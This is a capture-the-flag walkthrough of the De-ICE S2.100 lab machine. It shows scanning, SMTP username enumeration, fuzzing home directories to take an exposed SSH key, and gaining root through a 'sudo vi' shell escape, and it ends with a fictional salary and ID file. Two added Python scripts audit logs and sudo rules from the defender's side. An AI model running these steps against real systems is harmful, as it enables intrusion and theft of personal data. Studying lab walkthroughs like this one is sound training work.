tags: de-ice

De-ICE S2.100

This is how I solved the De-ICE S2.100 challenge. The goal is to obtain salary information for the team of employees.

Netdiscover

As usual I ran netdiscover on the subnet range, and straight away something jumped out.

This VM was hosting two Apache services on different IPs.

[email protected]:~/de-ice/2.100# netdiscover -r 192.168.2.0/24 -i eth2

Currently scanning: Finished!   |   Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
_____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
-----------------------------------------------------------------------------
192.168.2.100   08:00:27:f6:e8:1d    01    060   CADMUS COMPUTER SYSTEMS
192.168.2.101   08:00:27:f6:e8:1d    01    060   CADMUS COMPUTER SYSTEMS

Nmap

I then scanned the two IPs with nmap.

[email protected]:~/de-ice/2.100# nmap -n -sV -A -p- 192.168.2.100; nmap -n -sV -A -p- 192.168.2.101

PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "EOF"
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
|_imap-capabilities: CAPABILITY SCAN LOGIN-REFERRALS MAILBOX-REFERRALS MULTIAPPEND SORT UNSELECT NAMESPACE STARTTLS LITERAL+ IDLE THREAD=REFERENCES THREAD=ORDEREDSUBJECT OK IMAP4REV1 SASL-IR AUTH=LOGINA0001 completed BINARY
443/tcp closed https

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).

The Apache service on .100 served a page with a long list of employees, and as before I used these names to build a list of potential usernames. This list was quite a lot longer than in previous challenges, so brute-forcing SSH logins would have taken longer than I was willing to spend.

SMTP

I decided to try to validate usernames via the SMTP service. After experimenting with the different methods, I had a list of valid users.

[email protected]:~/de-ice/2.100# smtp-user-enum -M RCPT -f root@slax.example.net -U users -t 192.168.2.100
192.168.2.100: havisham exists
192.168.2.100: magwitch exists
192.168.2.100: pirrip exists

Nikto

I continued to enumerate the other services, but nothing popped until I ran nikto against the Apache service on .101 (I can imagine that sent quite a few people crazy).

[email protected]:~/de-ice/2.100# nikto -h 192.168.2.101 -Display 124
+ OSVDB-637: /~root/: Allowed to browse root's home directory.

It seemed that the root user’s home directory was accessible through Apache, although it appeared empty.

Wfuzz

Wfuzz is a web crawler and fuzzing tool. With my list of valid users, I was able to locate their home directories as well, but they also appeared empty. I then used wfuzz to look for hidden files and directories that are likely to exist in a user's home directory (.bashrc, .bash_history, .ssh etc.).

I got a hit for a .ssh directory in pirrip’s directory - within which were id_rsa files.

[email protected]:~/de-ice/2.100# wfuzz -c -z file,users --hc 404 http://192.168.2.101/~FUZZ/
00001:  C=200     11 L           46 W         570 Ch       " - havisham"
00002:  C=200     11 L           46 W         570 Ch       " - magwitch"
00003:  C=200     11 L           46 W         566 Ch       " - pirrip"

[email protected]:~/de-ice/2.100# wfuzz -c -zfile,users --hc 404 http://192.168.2.101/~FUZZ/.ssh
00003:  C=301      9 L           29 W         329 Ch       " - pirrip"
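From the defender's side, this probing leaves a clear trail in the Apache access log: one client walking through ~user home directories and, worse, getting a 2xx/3xx back for a dotfile. The following script is an added example, not part of the original writeup, that flags exactly that pattern; the log lines, the function name and the threshold are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache combined log format (not from the original page):
# one client spraying ~user home directories as the wfuzz runs above would, and one normal visitor.
SAMPLE_LOG = """\
192.168.2.200 - - [01/Jan/2008:10:00:01 +0000] "GET /~havisham/ HTTP/1.0" 200 570 "-" "Wfuzz/2.0"
192.168.2.200 - - [01/Jan/2008:10:00:01 +0000] "GET /~magwitch/ HTTP/1.0" 200 570 "-" "Wfuzz/2.0"
192.168.2.200 - - [01/Jan/2008:10:00:02 +0000] "GET /~pirrip/.bash_history HTTP/1.0" 404 209 "-" "Wfuzz/2.0"
192.168.2.200 - - [01/Jan/2008:10:00:02 +0000] "GET /~pirrip/.ssh HTTP/1.0" 301 329 "-" "Wfuzz/2.0"
192.168.2.200 - - [01/Jan/2008:10:00:03 +0000] "GET /~pirrip/.ssh/id_rsa HTTP/1.0" 200 1675 "-" "Wfuzz/2.0"
192.168.2.50 - - [01/Jan/2008:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.168.2.50 - - [01/Jan/2008:10:05:01 +0000] "GET /~havisham/ HTTP/1.1" 200 570 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Requests into a UserDir tree; the optional group captures a leading dotfile/dotdir component.
HOMEDIR_RE = re.compile(r'^/~(?P<user>[^/]+)/(?P<dot>\.[^/?]*)?')

def audit_userdir_requests(log_text, probe_threshold=3):
    """Return {client: {"probes": n, "exposed": [paths]}} for suspicious clients.

    A client is reported when it requests at least probe_threshold distinct ~user
    paths (spraying home directories), or when any dotfile request under a home
    directory got a 2xx/3xx, which means the server really is exposing it.
    """
    per_client = defaultdict(lambda: {"paths": set(), "exposed": []})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-format line, skip it
        h = HOMEDIR_RE.match(m["path"])
        if not h:
            continue                       # not a ~user request
        rec = per_client[m["client"]]
        rec["paths"].add(m["path"])
        if h["dot"] and m["status"][0] in "23":
            rec["exposed"].append(m["path"])
    report = {}
    for client, rec in per_client.items():
        if len(rec["paths"]) >= probe_threshold or rec["exposed"]:
            report[client] = {"probes": len(rec["paths"]),
                              "exposed": sorted(rec["exposed"])}
    return report

if __name__ == "__main__":
    for client, rec in audit_userdir_requests(SAMPLE_LOG).items():
        print(client, rec)
```

Any entry in "exposed" is a confirmed leak to fix on the server (disable UserDir for root, deny dotfiles under public_html), not just an alert to triage.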

SSH

I downloaded the id_rsa private key and was able to SSH in as pirrip.

[email protected]:~/de-ice/2.100# chmod 400 id_rsa
[email protected]:~/de-ice/2.100# ssh -i id_rsa pirrip@192.168.2.100
Linux 2.6.16.
[email protected]:~$

Reviewing the passwd and group files showed that pirrip was a member of the wheel group, but I was unable to use sudo as I didn't know pirrip's password. I began looking through the filesystem and eventually came across /var/spool/mail/pirrip. Within it was a password-reminder email for pirrip; I tried this password with sudo and it worked.

[email protected]:~$ more /var/spool/mail/pirrip 
E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

[email protected]:~$ sudo -l
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat ALL

Sudo

I could now see the list of sudo rights for pirrip. I could have used these to read the shadow file and try to crack the root password. However, an easier route to a root shell is through the vi text editor.

[email protected]:~$ sudo vi
:!/bin/bash
bash-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
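The sudo -l output above is what a sudoers audit should catch before anyone needs to escape from vi. As an added example, not from the original writeup, this Python function parses sudo -l style output and flags rules that grant editors or pagers with shell escapes without the NOEXEC tag, and file readers with no argument restriction (which can read /etc/shadow). The two rule sets, the hardened second one and the function name are constructed for the example.

```python
import os
import re

# Constructed: the first block mirrors the sudo -l output shown above, the second is a
# hypothetical hardened version of the same rights (NOEXEC tag, explicit file arguments).
SUDO_L_ORIGINAL = """\
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat ALL
"""
SUDO_L_HARDENED = """\
User pirrip may run the following commands on this host:
    (root) NOEXEC: /usr/bin/vi /etc/httpd/httpd.conf
    (root) /usr/bin/tail /var/log/httpd/access_log
"""

# "(runas) TAG: TAG: /path/to/cmd [args]" as printed by sudo -l
RULE_RE = re.compile(
    r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)(?:\s+(?P<args>.+))?$')
SHELL_ESCAPE = {"vi", "vim", "view", "more", "less", "man"}   # can spawn a shell via ! or :!
FILE_READERS = {"cat", "tail", "head"}                        # read any file as root

def audit_sudo_rules(sudo_l_output):
    """Return a list of findings ({cmd, issue, fix}) for risky sudo rules."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue                                   # header or blank line
        name = os.path.basename(m["cmd"])
        tags = set(re.findall(r"[A-Z_]+", m["tags"]))  # e.g. {"NOEXEC"}, {"NOPASSWD"}
        args = (m["args"] or "").strip()
        unrestricted = args in ("", "ALL")             # no argument restriction at all
        if name in SHELL_ESCAPE and "NOEXEC" not in tags:
            findings.append({"cmd": m["cmd"],
                             "issue": "shell escape gives a root shell",
                             "fix": "add the NOEXEC tag, or grant sudoedit on specific files"})
        if name in FILE_READERS and unrestricted:
            findings.append({"cmd": m["cmd"],
                             "issue": "reads any file as root (e.g. /etc/shadow)",
                             "fix": "restrict the rule to explicit file arguments"})
    return findings

if __name__ == "__main__":
    for f in audit_sudo_rules(SUDO_L_ORIGINAL):
        print(f"{f['cmd']}: {f['issue']} -> {f['fix']}")
    print("hardened findings:", audit_sudo_rules(SUDO_L_HARDENED))
```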

Flag

I then found great_expectations.zip within /root/.save/. Trying to extract it directly on the server resulted in error messages about limited disk space, so I transferred the file to my Kali machine using netcat.

No password was required to decompress the archive, which gave me access to Jan08.

[email protected]:~/de-ice/2.100# unzip great_expectations.zip 
[email protected]:~/de-ice/2.100# tar -xvf great_expectations.tar 
[email protected]:~/de-ice/2.100# cat Jan08 
 
Philip Pirrip:  734-67-0424 5.5% $74,224
Abel Magwitch:  816-03-0028 4.0% $53,122
Estella Havisham: 762-93-1073 12% $84,325